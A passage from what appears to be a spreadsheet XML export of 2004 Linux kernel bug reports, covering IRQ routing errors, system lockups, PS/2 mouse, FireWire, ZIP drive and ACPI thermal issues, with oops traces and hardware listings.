    <t>Natalie Protasevich reports: "mp_override_legacy_irq() parses ACPI INT_SRC_OVR entries, and each override entry results in a change of corresponding mp_irqs[] array element. The problem happens when the dest_irq (pin) numerically smaller than the bus irq and is assigned higher array element (we index of the srcbus_irq) that the original bus irq with default correspondence. The mp_irqs[] element with new bus irq gets changed allright, but there is still the original (unmodified) element with default one-to-one assignment above it in the array. Int: mp_irq 12, type 0, pol 0, trig 0, bus 0, irq 13, 129-13 &lt;-- original entry for bus irq (and pin) 13 Int: mp_irq 13, type 0, pol 1, trig 1, bus 0, irq 14, 129-15 Int: mp_irq 14, type 0, pol 1, trig 1, bus 0, irq 15, 129-13 &lt;-- modified entry for bus irq 15, with override for pin 13 Since it is a valid entry, find_irq_entry() in setup_IO_APIC_irqs() searches the mp_irqs[] by the pin number and runs into this element first. It uses it to program the pin and never gets to the element down below that contains modified entry with a correct overwrite in it."</t>
  </si>
  <si>
    <t>Hard lockup, freeze, hang, deadlock</t>
  </si>
  <si>
    <t>2004-04-16 01:27 UTC</t>
  </si>
  <si>
    <t>Jakob</t>
  </si>
  <si>
    <t>2004-12-01 00:02 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian GNU/Linux 3.0r2 with updated procps and net-tools if that matters Hardware Environment: Dual AthlonMP 2000+ (SMP 2CPU enabled, preempt disabled), 1GB RAM (highmem 4G enabled), six IDE disks (on on-board AMD and two extra Promise controllers), Intel e100 and e1000 NICs. Software Environment: SMP kernel (no preempt). ext3fs filesystems. Software RAID 0+1. Machine is link/compile server as well as NFS server. Problem Description: Kernel freezes completely (with no error messages, no oops, no panic) after about 15 minutes of operation. It seems the freeze is caused by loading the system - at the time of the freeze it ran some large compile jobs, some large link jobs, and served a lot of NFS I/O. I believe that this is a fairly "standard" configuration - I do not use modules, I do not use preempt, I do not use process accounting or any of the other features that I know have historically been causing such hangs. This machine is rock solid on 2.4.25. When the machine freezes, Magic-SysRQ is unresponsive as well. Nothing short of a power-cycle will bring the box back up. Steps to reproduce: Boot 2.6.5. Start a large distributed compilation. Watch machine die. Please let me know if I should send .config, /proc/* output or whatever. Should I try running with sleep-in-spinlock checking or some other option?</t>
  </si>
  <si>
    <t>Compilation fails with varous (mainly asm related) errors</t>
  </si>
  <si>
    <t>2004-04-16 01:35 UTC</t>
  </si>
  <si>
    <t>Bgs</t>
  </si>
  <si>
    <t>2004-06-21 13:23 UTC</t>
  </si>
  <si>
    <t>Francois Romieu</t>
  </si>
  <si>
    <t>Peter Kerwien</t>
  </si>
  <si>
    <t>2.4.26</t>
  </si>
  <si>
    <t>PS/2 mouse problem</t>
  </si>
  <si>
    <t>2.6.5, 2.6.6-rc1</t>
  </si>
  <si>
    <t>2004-04-18 11:22 UTC</t>
  </si>
  <si>
    <t>Moonz</t>
  </si>
  <si>
    <t>2005-12-21 08:56 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 1, with a self-compiled kernel Hardware Environment: PowerNet Computer with a PS/2 mouse Software Environment: XFree 4.3 with /dev/psaux as corepointer Problem Description: When I unload and reload the module psmouse (echo 3 &gt; /proc/acpi/sleep e.g.), my mouse seem to be crazy: moving mouse move the cursor on the other side of the screen and click himself Apr 18 20:15:00 localhost kernel: Stopping tasks: ===================================================================| Apr 18 20:15:00 localhost kernel: blk: queue c157b600, I/O limit 4095Mb (mask 0xffffffff) Apr 18 20:15:00 localhost kernel: Restarting tasks... done Apr 18 20:15:00 localhost kernel: input: PS/2 Generic Mouse on isa0060/serio1 Apr 18 20:15:28 localhost kernel: psmouse.c: Mouse at isa0060/serio1/input0 lost synchronization, throwing 2 bytes away. Steps to reproduce: rmmod psmouse; moprobe psmouse or echo 3 &gt; /proc/acpi/sleep</t>
  </si>
  <si>
    <t>Paralell port ZIP drive 100 dosen't work with 2.6.5</t>
  </si>
  <si>
    <t>2004-04-18 23:46 UTC</t>
  </si>
  <si>
    <t>Peter</t>
  </si>
  <si>
    <t>2005-07-21 05:21 UTC</t>
  </si>
  <si>
    <t>drivers_parallel</t>
  </si>
  <si>
    <t>Distribution:Debian Woody 3.0 R1 Hardware Environment:i386; Duron 1100, MB QDI KinetiZ, Paralell port ZIPdrive 100 connected to LPT, printer EPSON LX-300 connected to ZIPdrive Software Environment: Problem Description:I compiled new kernel 2.6.5 for my machine and with the 2.6.5 kernel the paralell port ZIPdrive stopped working -it dosen't even mount the drive, claims "not valid block device". With THE SAME kernel settings, kernel 2.6.4 worked well, and if I boot the old kernel, it still works fine. I suspect that some changes between 2.6.4 and 2.6.5 kernel has broken the Paralell ZIPdrive functionality, or at least changed something that I need to know to restore function of the ZIP. Steps to reproduce: 1, compile the kernel 2.6.5 with paralell port support, IDE/ATAPI Floppy, SCSI and related support 2, try to use paralell port ZIP drive</t>
  </si>
  <si>
    <t>linux-2.6.5-mm6</t>
  </si>
  <si>
    <t>2004-04-20 19:50 UTC</t>
  </si>
  <si>
    <t>Gerald J. Normandin jr.</t>
  </si>
  <si>
    <t>2004-11-30 23:25 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: Amd AthlonXP 1800+ 768 Megs Pc2100 Abit Nf7-s v2 (Nforce2) Software Environment: gcc version 3.3.2 linux-2.6.5-mm6 hdparm v5.4 Problem Description: Hard Lock running hdparm -t /dev/hda Steps to reproduce: Fire up console login as root type hdparm -t /dev/hda Watch in disbelief as system hardlocks</t>
  </si>
  <si>
    <t>Loading Firewire driver causes badness</t>
  </si>
  <si>
    <t>2004-04-20 19:56 UTC</t>
  </si>
  <si>
    <t>2004-11-30 22:13 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: AthlonXp 1800+ 768 megs ram Abit NF7-S v2 (Nforce2) Software Environment: gcc version 3.3.2 linux-2.6.5-mm6 Problem Description: Steps to reproduce: load module, watch badness occur: Apr 20 22:29:49 screamer kernel: Badness in get_phy_reg at drivers/ieee1394/ohci1394.c:238 Apr 20 22:29:49 screamer kernel: Call Trace: Apr 20 22:29:49 screamer kernel: [&lt;c02bd956&gt;] get_phy_reg+0x116/0x120 Apr 20 22:29:49 screamer kernel: [&lt;c01066a4&gt;] do_IRQ+0xb4/0x130 Apr 20 22:29:49 screamer kernel: [&lt;c02be69c&gt;] ohci_devctl+0x5c/0x5d0 Apr 20 22:29:49 screamer kernel: [&lt;c0104a34&gt;] common_interrupt+0x18/0x20 Apr 20 22:29:49 screamer kernel: [&lt;c010f354&gt;] delay_tsc+0x14/0x40 Apr 20 22:29:49 screamer kernel: [&lt;c02c0788&gt;] ohci_irq_handler+0x568/0x810 Apr 20 22:29:49 screamer kernel: [&lt;c0122610&gt;] do_timer+0xe0/0xf0 Apr 20 22:29:49 screamer kernel: [&lt;c01062ea&gt;] handle_IRQ_event+0x3a/0x70 Apr 20 22:29:49 screamer kernel: [&lt;c0106681&gt;] do_IRQ+0x91/0x130 Apr 20 22:29:49 screamer kernel: [&lt;c0104a34&gt;] common_interrupt+0x18/0x20 Apr 20 22:29:49 screamer kernel: [&lt;c02bd9ed&gt;] set_phy_reg+0x8d/0x120 Apr 20 22:29:49 screamer kernel: [&lt;c0273446&gt;] as_put_request+0x76/0xd0 Apr 20 22:29:49 screamer kernel: [&lt;c02b3ec0&gt;] delayed_reset_bus+0x0/0xd0 Apr 20 22:29:49 screamer kernel: [&lt;c02be6b6&gt;] ohci_devctl+0x76/0x5d0 Apr 20 22:29:49 screamer kernel: [&lt;c02bc6b7&gt;] csr1212_fill_cache+0x97/0x100 Apr 20 22:29:49 screamer kernel: [&lt;c02b3ec0&gt;] delayed_reset_bus+0x0/0xd0 Apr 20 22:29:49 screamer kernel: [&lt;c02b135c&gt;] hpsb_reset_bus+0x3c/0x40 Apr 20 22:29:49 screamer kernel: [&lt;c02b3f74&gt;] delayed_reset_bus+0xb4/0xd0 Apr 20 22:29:49 screamer kernel: [&lt;c0122424&gt;] run_timer_softirq+0xd4/0x1d0 Apr 20 22:29:49 screamer kernel: [&lt;c0122610&gt;] do_timer+0xe0/0xf0 Apr 20 22:29:49 screamer kernel: [&lt;c011e27d&gt;] __do_softirq+0x7d/0x80 Apr 20 22:29:49 screamer kernel: [&lt;c011e2a6&gt;] do_softirq+0x26/0x30 Apr 20 22:29:49 screamer kernel: [&lt;c01066ed&gt;] do_IRQ+0xfd/0x130 Apr 20 22:29:49 screamer kernel: [&lt;c0104a34&gt;] common_interrupt+0x18/0x20 Apr 20 22:29:49 screamer kernel: [&lt;c0102053&gt;] default_idle+0x23/0x30 Apr 20 22:29:49 screamer kernel: [&lt;c01020bc&gt;] cpu_idle+0x2c/0x40 Apr 20 22:29:49 screamer kernel: [&lt;c04fe84d&gt;] start_kernel+0x16d/0x190 Apr 20 22:29:49 screamer kernel: [&lt;c04fe4a0&gt;] unknown_bootoption+0x0/0x120 Apr 20 22:29:49 screamer kernel: Apr 20 22:29:49 screamer kernel: Badness in set_phy_reg at drivers/ieee1394/ohci1394.c:267 Apr 20 22:29:49 screamer kernel: Call Trace: Apr 20 22:29:49 screamer kernel: [&lt;c02bda78&gt;] set_phy_reg+0x118/0x120 Apr 20 22:29:49 screamer kernel: [&lt;c01066a4&gt;] do_IRQ+0xb4/0x130 Apr 20 22:29:49 screamer kernel: [&lt;c02be6b6&gt;] ohci_devctl+0x76/0x5d0 Apr 20 22:29:49 screamer kernel: [&lt;c010f354&gt;] delay_tsc+0x14/0x40 Apr 20 22:29:49 screamer kernel: [&lt;c02c0788&gt;] ohci_irq_handler+0x568/0x810 Apr 20 22:29:49 screamer kernel: [&lt;c0122610&gt;] do_timer+0xe0/0xf0 Apr 20 22:29:49 screamer kernel: [&lt;c01062ea&gt;] handle_IRQ_event+0x3a/0x70 Apr 20 22:29:49 screamer kernel: [&lt;c0106681&gt;] do_IRQ+0x91/0x130 Apr 20 22:29:49 screamer kernel: [&lt;c0104a34&gt;] common_interrupt+0x18/0x20 Apr 20 22:29:49 screamer kernel: [&lt;c02bd9ed&gt;] set_phy_reg+0x8d/0x120 Apr 20 22:29:49 screamer kernel: [&lt;c0273446&gt;] as_put_request+0x76/0xd0 Apr 20 22:29:49 screamer kernel: [&lt;c02b3ec0&gt;] delayed_reset_bus+0x0/0xd0 Apr 20 22:29:49 screamer kernel: [&lt;c02be6b6&gt;] ohci_devctl+0x76/0x5d0 Apr 20 22:29:49 screamer kernel: [&lt;c02bc6b7&gt;] csr1212_fill_cache+0x97/0x100 Apr 20 22:29:49 screamer kernel: [&lt;c02b3ec0&gt;] delayed_reset_bus+0x0/0xd0 Apr 20 22:29:49 screamer kernel: [&lt;c02b135c&gt;] hpsb_reset_bus+0x3c/0x40 Apr 20 22:29:49 screamer kernel: [&lt;c02b3f74&gt;] delayed_reset_bus+0xb4/0xd0 Apr 20 22:29:49 screamer kernel: [&lt;c0122424&gt;] run_timer_softirq+0xd4/0x1d0 Apr 20 22:29:49 screamer kernel: [&lt;c0122610&gt;] do_timer+0xe0/0xf0 Apr 20 22:29:49 screamer kernel: [&lt;c011e27d&gt;] __do_softirq+0x7d/0x80 Apr 20 22:29:49 screamer kernel: [&lt;c011e2a6&gt;] do_softirq+0x26/0x30 Apr 20 22:29:49 screamer kernel: [&lt;c01066ed&gt;] do_IRQ+0xfd/0x130 Apr 20 22:29:49 screamer kernel: [&lt;c0104a34&gt;] common_interrupt+0x18/0x20 Apr 20 22:29:49 screamer kernel: [&lt;c0102053&gt;] default_idle+0x23/0x30 Apr 20 22:29:49 screamer kernel: [&lt;c01020bc&gt;] cpu_idle+0x2c/0x40 Apr 20 22:29:49 screamer kernel: [&lt;c04fe84d&gt;] start_kernel+0x16d/0x190 Apr 20 22:29:49 screamer kernel: [&lt;c04fe4a0&gt;] unknown_bootoption+0x0/0x120</t>
  </si>
  <si>
    <t>LAPIC timer loses time if C3 enabled</t>
  </si>
  <si>
    <t>2004-04-21 19:24 UTC</t>
  </si>
  <si>
    <t>2006-02-15 18:36 UTC</t>
  </si>
  <si>
    <t>With the processor in C3-state, we miss local APIC timer interrupts. I presume the reason is, in C3-state local APIC clock is stopped. This results in strange situation when I have LAPIC enabled (or use SMP kernel), on a system that supports C3 state (T40). In the above case, HZ will be incremented based on timer interrupts from PIT. So, that will go at a normal rate (100 per sec). But, the LAPIC timer interrupt, which is used for scheduler purposes and process time accounting in the kernel, will run at a much lower speed (something like 1/2 or 1/4th of HZ). How to identify the problem: Run SMP kernel on T40. cat /proc/interrupts Normally number for timer and LOC should be nearly same, but in this case we see them widely different.</t>
  </si>
  <si>
    <t>enable use of IRQ2 in ACPI/IOAPIC mode -- delete "cascade" interrupt</t>
  </si>
  <si>
    <t>2004-04-22 08:24 UTC</t>
  </si>
  <si>
    <t>2004-05-11 23:28 UTC</t>
  </si>
  <si>
    <t>The current kernel reserves IRQ2 for a "cascade" interrupt: CPU0 CPU1 0: 42115460 42772218 IO-APIC-edge timer 1: 214789 218925 IO-APIC-edge keyboard 2: 0 0 XT-PIC cascade 4: 10087 5750 IO-APIC-edge serial The concept was to reserve this IRQ for "mixed mode" configurations supported by MPS- 1.4 where the PIC is routed to the APIC pin-2. However, ACPI does not support mixed-mode configurations, and so this reservation adds no value, and on some systems it prevents use of IRQ2 for other purposes. Witih "cascade" gone, however, most PCs will still not use IRQ2, because the typical PC has an interrupt over-ride mapping IRQ0-&gt;pin-2 for the legacy PIT timer. While this doesn't technically consume the label IRQ2, it takes pin-2, which prevents the system from setting up a default identity mapping from IRQ2-&gt;pin2. So with cascade gone there are to ways to use IRQ2: 1. if no IRQ0-&gt;pin2 override the nforce2 is an example -- it connects the timer to pin0 and so a (correct BIOS) doesn't have an IRQ0-&gt;pin2 override. (of course the board would still need to connect a device to this pin) Another example is the ES7000, which maps IRQ0-&gt;pin20 for its legacy timer, leaving IRQ2 and pin2 free for an identity mapping, which is routed to a PCI interrupt per an ACPI _PRT entry. 2. IRQ0-&gt;pin2 override present An additional override can be added to the BIOS to map IRQ2 to a free pin. eg IRQ2-&gt;pin0 plus the above would exchange the default IRQ0/IRQ2 names given to pin0/pin2.</t>
  </si>
  <si>
    <t>wrong irq rouing on centrino laptop - PIC</t>
  </si>
  <si>
    <t>2.4.26, 2.6.5</t>
  </si>
  <si>
    <t>2004-04-22 09:45 UTC</t>
  </si>
  <si>
    <t>Andrey Ulanov</t>
  </si>
  <si>
    <t>Hardware Environment: some centrino laptop Problem Description: I'm trying to use Intel Wireless 2100 adapter on my centrino based notebook. I use ipw2100 drivers from ipw2100.sf.net. The thing is that hardware says that the device should generate irq11, but it really generates irq5. I tryed both 2.4.26 and 2.6.5. I also tryed to compile kernel with and without ACPI. I tryed to compile kernel with and without APIC support. I also tryed to pass some parameters to kernel (acpi=off, acpi=force, pci=biosirq). But anyway kernel says irq 11 and device generates irq5. Of course it is possible to be hardware problem, but it works under windows.</t>
  </si>
  <si>
    <t>atapi devices don't work with nforce2</t>
  </si>
  <si>
    <t>2.6.5, 2.6.6rc2</t>
  </si>
  <si>
    <t>2004-04-22 11:25 UTC</t>
  </si>
  <si>
    <t>2004-06-20 06:51 UTC</t>
  </si>
  <si>
    <t>Since kernel 2.6.5 my cdrom and cdrecorder don't work any longer: Unable to handle kernel NULL pointer dereference at virtual address 0000003c printing eip: e184d85b *pde = 00000000 Oops: 0000 [#1] PREEMPT CPU: 0 EIP: 0060:[&lt;e184d85b&gt;] Not tainted EFLAGS: 00010296 (2.6.6-rc2) EIP is at cdrom_get_random_writable+0x5b/0xb0 [cdrom] eax: 00000000 ebx: c178de34 ecx: 00000000 edx: c178de34 esi: c1575104 edi: c178de7c ebp: c03335a0 esp: c178de04 ds: 007b es: 007b ss: 0068 Process modprobe (pid: 154, threadinfo=c178c000 task=c1522bb0) Stack: c1575104 c178de34 00000018 00000002 00000000 00000000 00000000 00000000 00000000 00000000 00000000 df745660 20000046 00000000 00000018 c178de14 00000018 00000000 00000000 00000002 00000001 00001388 00000000 c178de64 Call Trace: [&lt;e184d975&gt;] cdrom_is_random_writable+0x25/0x50 [cdrom] [&lt;c0174a0d&gt;] get_inode_number+0x3d/0x70 [&lt;e185bb7a&gt;] ide_cdrom_probe_capabilities+0x9a/0x590 [ide_cd] [&lt;c0174e07&gt;] proc_register+0x17/0xb0 [&lt;c01fb83b&gt;] ide_add_proc_entries+0x3b/0x70 [&lt;e185c4da&gt;] ide_cdrom_setup+0x2ba/0x460 [ide_cd] [&lt;e185cb12&gt;] ide_cdrom_attach+0x122/0x260 [ide_cd] [&lt;c0129fa2&gt;] load_module+0x732/0x9d0 [&lt;c01ef872&gt;] ata_attach+0xd2/0x1a0 [&lt;c01f0728&gt;] ide_register_driver+0x108/0x120 [&lt;e185cc5f&gt;] ide_cdrom_init+0xf/0x20 [ide_cd] [&lt;c012a354&gt;] sys_init_module+0x114/0x230 [&lt;c0103ec7&gt;] syscall_call+0x7/0xb Code: ff 50 3c 85 c0 89 c2 75 16 8b 44 24 10 0f c8 83 f8 17 77 1b</t>
  </si>
  <si>
    <t>IRQ21 flood on nForce2 any time IRQ21 is active</t>
  </si>
  <si>
    <t>2004-04-22 20:09 UTC</t>
  </si>
  <si>
    <t>Noel Maddy</t>
  </si>
  <si>
    <t>2004-11-03 17:36 UTC</t>
  </si>
  <si>
    <t>2227 2570</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: Chaintech 7NIF2, XP 1800+ Software Environment: Problem Description: When IRQ 21 is in use, it gives &gt; 100k interrupts/sec. I'm using 2.6.5 with Ross's c1 patch and Len's acpi_skip_timer_override patch. Both echi_hcd and intel_8x0 use IRQ 21. I have them both compiled as modules. When either or both modules are inserted, I get between 100k and 200k interrupts per second on IRQ 21. When either or both are compiled into the kernel, I get the same interrupt flood Steps to reproduce: Boot into ACPI kernel with ehci_hcd or intel_8x0 active</t>
  </si>
  <si>
    <t>ALSA ens_1370 module not working properly</t>
  </si>
  <si>
    <t>all 2.6.x</t>
  </si>
  <si>
    <t>2004-04-23 08:14 UTC</t>
  </si>
  <si>
    <t>2005-11-01 10:00 UTC</t>
  </si>
  <si>
    <t>Can set all but active[2] temperature via trip_points</t>
  </si>
  <si>
    <t>2.6.5 + swsusp2</t>
  </si>
  <si>
    <t>2004-04-24 23:21 UTC</t>
  </si>
  <si>
    <t>Hugo Haas</t>
  </si>
  <si>
    <t>2004-11-15 20:59 UTC</t>
  </si>
  <si>
    <t>acpi_config-other</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: Compaq Evo N410c Problem Description: I have found a weird problem: using /proc/acpi/thermal_zone/TZ1/trip_points, I can set all but the active[2] temperature. Steps to reproduce: root@buena:/proc/acpi/thermal_zone/TZ1# cat * &lt;not supported&gt; &lt;polling disabled&gt; state: active[2] temperature: 44 C critical (S5): 94 C passive: 90 C: tc1=1 tc2=2 tsp=100 devices=0xc1522c00 active[0]: 80 C: devices=0xc1524d20 active[1]: 65 C: devices=0xc1524c80 active[2]: 40 C: devices=0xc1524c00 root@buena:/proc/acpi/thermal_zone/TZ1# echo -n "95:0:91:81:66:41" &gt; trip_points root@buena:/proc/acpi/thermal_zone/TZ1# cat * &lt;not supported&gt; &lt;polling disabled&gt; state: active[2] temperature: 44 C critical (S5): 95 C passive: 91 C: tc1=1 tc2=2 tsp=100 devices=0xc1522c00 active[0]: 81 C: devices=0xc1524d20 active[1]: 66 C: devices=0xc1524c80 active[2]: 40 C: devices=0xc1524c00 Regards, Hugo</t>
  </si>
  <si>
    <t>Compile time error about acpi_skip_timer_override</t>
  </si>
  <si>
    <t>2004-04-27 01:52 UTC</t>
  </si>
  <si>
    <t>2004-05-11 23:44 UTC</t>
  </si>
  <si>
    <t>pull from latest 2.6 acpi tree, compile kernel got compile error about acpi_skip_timer_override.</t>
  </si>
  <si>
    <t>2.6.7-rc1</t>
  </si>
  <si>
    <t>kernel dump when unplugging device</t>
  </si>
  <si>
    <t>2.6.5-1-k7</t>
  </si>
  <si>
    <t>2004-04-28 07:58 UTC</t>
  </si>
  <si>
    <t>Sebasti</t>
  </si>
  <si>
    <t>2004-07-14 16:04 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable kernel 2.6.5-1-k7 maschine2:/home/jo# uname -a Linux maschine2 2.6.5-1-k7 #1 Sat Apr 24 12:03:50 EST 2004 i686 GNU/Linux Hardware Environment: maschine2:/home/jo# cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 8 model name : AMD Athlon(tm) XP 2200+ stepping : 1 cpu MHz : 1808.927 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse syscall mmxext 3dnowext 3dnow bogomips : 3579.90 maschine2:/home/jo# lspci -vvv 0000:00:00.0 Host bridge: VIA Technologies, Inc. VT8377 [KT400/KT600 AGP] Host Bridge Subsystem: Giga-byte Technology GA-7VAX Mainboard Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 8 Region 0: Memory at d0000000 (32-bit, prefetchable) Capabilities: [a0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3- Rate=x1,x2,x4 Command: RQ=32 ArqSz=0 Cal=0 SBA+ AGP+ GART64- 64bit- FW- Rate=x1 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:01.0 PCI bridge: VIA Technologies, Inc. VT8235 PCI Bridge (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000c000-0000cfff Memory behind bridge: e0000000-e1ffffff Prefetchable memory behind bridge: d8000000-dfffffff Expansion ROM at 0000c000 [disabled] [size=4K] BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:0a.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Subsystem: Surecom Technology EP-320X-R Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (8000ns min, 16000ns max) Interrupt: pin A routed to IRQ 18 Region 0: I/O ports at d000 Region 1: Memory at e2000000 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0-,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:0b.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8029(AS) Subsystem: Realtek Semiconductor Co., Ltd. RTL-8029(AS) Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Interrupt: pin A routed to IRQ 19 Region 0: I/O ports at d400 0000:00:0c.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 11) Subsystem: Avermedia Technologies Inc: Unknown device 0003 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (4000ns min, 10000ns max) Interrupt: pin A routed to IRQ 16 Region 0: Memory at e2001000 (32-bit, prefetchable) Capabilities: [44] Vital Product Data Capabilities: [4c] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:0c.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11) Subsystem: Avermedia Technologies Inc: Unknown device 0003 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (1000ns min, 63750ns max) Interrupt: pin A routed to IRQ 16 Region 0: Memory at e2002000 (32-bit, prefetchable) Capabilities: [44] Vital Product Data Capabilities: [4c] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) (prog-if 00 [UHCI]) Subsystem: Giga-byte Technology GA-7VAX Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, Cache Line Size: 0x08 (32 bytes) Interrupt: pin A routed to IRQ 21 Region 4: I/O ports at d800 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ 0000:00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) (prog-if 00 [UHCI]) Subsystem: Giga-byte Technology GA-7VAX Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, Cache Line Size: 0x08 (32 bytes) Interrupt: pin B routed to IRQ 21 Region 4: I/O ports at dc00 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ 0000:00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) (prog-if 00 [UHCI]) Subsystem: Giga-byte Technology GA-7VAX Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, Cache Line Size: 0x08 (32 bytes) Interrupt: pin C routed to IRQ 21 Region 4: I/O ports at e000 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:10.3 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 82) (prog-if 20 [EHCI]) Subsystem: Giga-byte Technology GA-7VAX Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32, Cache Line Size: 0x10 (64 bytes) Interrupt: pin D routed to IRQ 21 Region 0: Memory at e2003000 (32-bit, non-prefetchable) Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:11.0 ISA bridge: VIA Technologies, Inc. VT8235 ISA Bridge Subsystem: Giga-byte Technology GA-7VAX Mainboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 0000:00:11.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Subsystem: Giga-byte Technology GA-7VAX 